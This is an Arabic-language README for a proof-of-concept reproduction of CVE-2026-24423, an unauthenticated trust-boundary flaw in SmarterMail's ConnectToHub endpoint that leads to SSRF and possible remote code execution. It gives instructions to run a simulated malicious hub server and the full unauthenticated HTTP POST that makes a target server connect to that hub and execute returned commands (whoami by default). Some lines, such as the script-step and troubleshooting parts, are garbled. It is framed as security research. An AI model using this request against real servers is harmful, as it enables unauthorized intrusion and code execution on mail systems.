
نص استنساخ لـ CVE-2026-24423، وهو انتهاك لحدود الثقة في SmarterMail ConnectToHub يؤدي إلى SSRF واحتمال تنفيذ تعليمات برمجية عن بُعد. يتضمن خادم Hub محاكى وتعليمات لتفعيل واجهة برمجة التطبيقات المعرضة للخطر.
# CVE-2026-24423 – إعادة الإنتاج
> ⚠️ **لأغراض البحث الأمني والاختبار المصرح به فقط / For security research and authorized testing only**
## نظرة عامة (Overview)
يُستخدم هذا المشروع لإعادة إنتاج ثغرة **CVE-2026-24423**.
توجد هذه الثغرة في وظيفة **SmarterMail ConnectToHub**، وسببها الجذري هو:
- واجهات الإدارة لا تتطلب مصادقة
- يقوم الخادم بالاتصال تلقائيًا بـ Hub يحدده المستخدم (SSRF)
- تُستخدم البيانات التي يعيدها الـ Hub الخارجي مباشرةً في عمليات محلية على مستوى النظام
تنتمي هذه الثغرة إلى **انتهاك حدود الثقة على مستوى التصميم (Trust Boundary Violation)**، وقد تؤدي في النهاية إلى تنفيذ تعليمات برمجية عن بُعد.
يُستخدم هذا المستودع **للتحقق من الثغرة والبحث التقني فقط**، وليس للاستغلال العدائي.
Start Hub Simulation Server
python3 cve-2026-24423.py
سيقوم هذا السكربت بما يلي:
SystemMountTrigger the Vulnerable API
استخدم Yakit أو Burp Suite لإرسال الطلب:
POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: ip:port
Content-Type: application/json
{
"hubAddress": "http://ip",
"oneTimePassword": "test",
"nodeName": "victim"
}
هذه الواجهة لا تتطلب مصادقة No authentication is required.
Troubleshooting
إذا فشلت إعادة إنتاج الثغرة:
MountPath في ملف cve-2026-24423.pyResult
عند نجاح تشغيل الثغرة، سيقوم SmarterMail بتحليل البيانات التي يعيدها الـ Hub، وينفذ الكود الافتراضي أمر whoami فقط.
لقطة مثال / Example:

تم إنجاز هذا المشروع بواسطة ChatGPT.